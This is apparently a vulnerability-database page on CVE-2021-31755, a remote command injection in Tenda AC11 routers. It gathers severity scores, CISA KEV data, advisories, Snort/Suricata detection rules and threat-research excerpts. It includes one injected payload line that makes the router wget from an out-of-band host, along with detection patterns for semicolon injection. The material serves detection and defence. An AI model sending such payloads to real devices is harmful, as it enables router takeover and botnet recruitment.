CVE-2021-31755
published 2021-05-07CVE-2021-31755: An issue was discovered on Tenda AC11 devices with firmware through 02.03.01.104_CN. A stack buffer overflow vulnerability in /goform/setmac allows attackers…
PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2021-11-17
Exploited in the wild
EPSS
85.85%
99.7th percentile
An issue was discovered on Tenda AC11 devices with firmware through 02.03.01.104_CN. A stack buffer overflow vulnerability in /goform/setmac allows attackers to execute arbitrary code on the system via a crafted post request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tenda | ac11_firmware | <= 02.03.01.104_cn | — |
Detection & IOCsextracted from sources · hover to see the quote
commandmac=wget+http://{{interactsh-url}}
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Trenda Router AC11 RCE Inbound (CVE-2021-31755)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/goform/setmac"; fast_pattern; http.request_body; content:"&mac="; reference:url,www.fortinet.com/blog/threat-research/the-ghosts-of-mirai; reference:url,github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-31755.yaml; reference:cve,2021-31755; classtype:attempted-admin; sid:2033284; rev:5; metadata:attack_target Networking_Equipment, tls_state plaintext, created_at 2021_07_08, cve CVE_2021_31755, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_10_21, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
snort
alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT Trenda Router AC11 RCE Outbound (CVE-2021-31755)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/goform/setmac"; fast_pattern; http.request_body; content:"&mac="; content:"|3b|"; within:40; reference:url,www.fortinet.com/blog/threat-research/the-ghosts-of-mirai; reference:cve,2021-31755; classtype:attempted-admin; sid:2033285; rev:2; metadata:created_at 2021_07_08, cve CVE_2021_31755, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
- →Exploit targets HTTP POST to /goform/setmac with a crafted `mac=` parameter containing shell metacharacters (e.g., semicolon 0x3b) or OS commands such as wget; inspect the request body for `&mac=` followed by non-MAC-address content within 40 bytes.
- →Inbound exploitation attempts arrive as unauthenticated POST requests to /goform/setmac; no prior authentication is required, so any such POST from an external source should be treated as suspicious.
- →Outbound callback (OOB/OAST) via wget to an attacker-controlled host is a reliable indicator of successful exploitation; monitor for unexpected outbound HTTP from router management IPs.
- →Nuclei template uses interactsh OOB interaction confirmation (HTTP protocol response) as the positive match condition for exploitation.
- →Associated with Mirai botnet campaigns; detections should be correlated with known Mirai IoT exploitation activity.
- ·Vulnerable firmware version is 02.03.01.104_CN and below; detections should be scoped to Tenda AC11 devices running this firmware range. ↗
- ·The ET Inbound rule (sid:2033284) targets plaintext HTTP only (tls_state plaintext); encrypted management interfaces would not be covered by this signature.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Tenda AC11 Router Stack Buffer Overflow Vulnerability
cisa·2021-11-03·CVSS 9.8
CVE-2021-31755 [CRITICAL] CWE-787 Tenda AC11 Router Stack Buffer Overflow Vulnerability
Vulnerability: Tenda AC11 Router Stack Buffer Overflow Vulnerability
Affected: Tenda AC11 Router
Tenda AC11 devices contain a stack buffer overflow vulnerability in /goform/setmac which allows attackers to execute code via a crafted post request.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2021-31755
Remediation Due Date: 2021-11-17
GHSA
GHSA-539c-2w6v-9rwx: An issue was discovered on Tenda AC11 devices with firmware through 02
ghsa_unreviewed·2022-05-24
CVE-2021-31755 [CRITICAL] CWE-787 GHSA-539c-2w6v-9rwx: An issue was discovered on Tenda AC11 devices with firmware through 02
An issue was discovered on Tenda AC11 devices with firmware through 02.03.01.104_CN. A stack buffer overflow vulnerability in /goform/setmac allows attackers to execute arbitrary code on the system via a crafted post request.
VulnCheck
Tenda AC11 Router Stack Buffer Overflow Vulnerability
vulncheck·2021·CVSS 9.8
CVE-2021-31755 [CRITICAL] CWE-787 Tenda AC11 Router Stack Buffer Overflow Vulnerability
Tenda AC11 Router Stack Buffer Overflow Vulnerability
Tenda AC11 devices contain a stack buffer overflow vulnerability in /goform/setmac which allows attackers to execute code via a crafted post request.
Affected: Tenda AC11 Router
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai; https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2021-31755; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-2
Suricata
ET EXPLOIT Trenda Router AC11 RCE Inbound (CVE-2021-31755)
suricata·2021-07-08·CVSS 9.8
CVE-2021-31755 [CRITICAL] ET EXPLOIT Trenda Router AC11 RCE Inbound (CVE-2021-31755)
ET EXPLOIT Trenda Router AC11 RCE Inbound (CVE-2021-31755)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Trenda Router AC11 RCE Inbound (CVE-2021-31755)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/goform/setmac"; fast_pattern; http.request_body; content:"&mac="; reference:url,www.fortinet.com/blog/threat-research/the-ghosts-of-mirai; reference:url,github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-31755.yaml; reference:cve,2021-31755; classtype:attempted-admin; sid:2033284; rev:5; metadata:attack_target Networking_Equipment, tls_state plaintext, created_at 2021_07_08, cve CVE_2021_31755, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, ta
Suricata
ET EXPLOIT Trenda Router AC11 RCE Outbound (CVE-2021-31755)
suricata·2021-07-08·CVSS 9.8
CVE-2021-31755 [CRITICAL] ET EXPLOIT Trenda Router AC11 RCE Outbound (CVE-2021-31755)
ET EXPLOIT Trenda Router AC11 RCE Outbound (CVE-2021-31755)
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT Trenda Router AC11 RCE Outbound (CVE-2021-31755)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/goform/setmac"; fast_pattern; http.request_body; content:"&mac="; content:"|3b|"; within:40; reference:url,www.fortinet.com/blog/threat-research/the-ghosts-of-mirai; reference:cve,2021-31755; classtype:attempted-admin; sid:2033285; rev:2; metadata:created_at 2021_07_08, cve CVE_2021_31755, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Nuclei
Tenda Router AC11 - Remote Command Injection
nuclei·CVSS 9.8
CVE-2021-31755 [CRITICAL] Tenda Router AC11 - Remote Command Injection
Tenda Router AC11 - Remote Command Injection
Tenda Router AC11 is susceptible to remote command injection vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
Template:
id: CVE-2021-31755
info:
name: Tenda Router AC11 - Remote Command Injection
author: gy741
severity: critical
description: Tenda Router AC11 is susceptible to remote command injection vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access, data exfiltration, and complete compromise of the affected rou
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42·2021-10-14
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh. This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC is working, but the service could also be used by attackers who want to be sure an exploit is working.
This blog will first introduce the Interactsh tool and how researchers or attackers can leverage it to perform vulnerability validation. We then describe some of the many exploits in the wild leveraging this tool, and we
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42·2021-10-14
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
Threat Research Center
Threat Research
Cybercrime
## Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
Yue Guan
Jin Chen
Leo Olson
Wayne Xin
Daiping Liu
Published: October 14, 2021
Cybercrime
Threat Research
Attack analysis
Exploit
Exploit in the wild
Interactsh
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh . This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC
Fortinet
The Ghosts of Mirai | FortiGuard Labs
blogs_fortinet·2021-06-24
The Ghosts of Mirai | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
The Ghosts of Mirai
By David Maciejak and Joie Salvio | June 24, 2021
FortiGuard Labs Threat Research Report
Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
It has been almost five years since the source code of the notorious MIRAI IoT malware was released to the public by its author in late 2016. This event led to the emergence of numerous copycats, creating their own flavors of IoT botnet armies. Although improvements have been constantly added since then by various threat actors, the structure and goal of the campaigns have remained the same.
IoT malware scans the Internet for IoT devices that use default or weak usernames and passwords. They also seek
2021-05-07
Published
2021-11-03
Added to CISA KEV
Exploited in the wild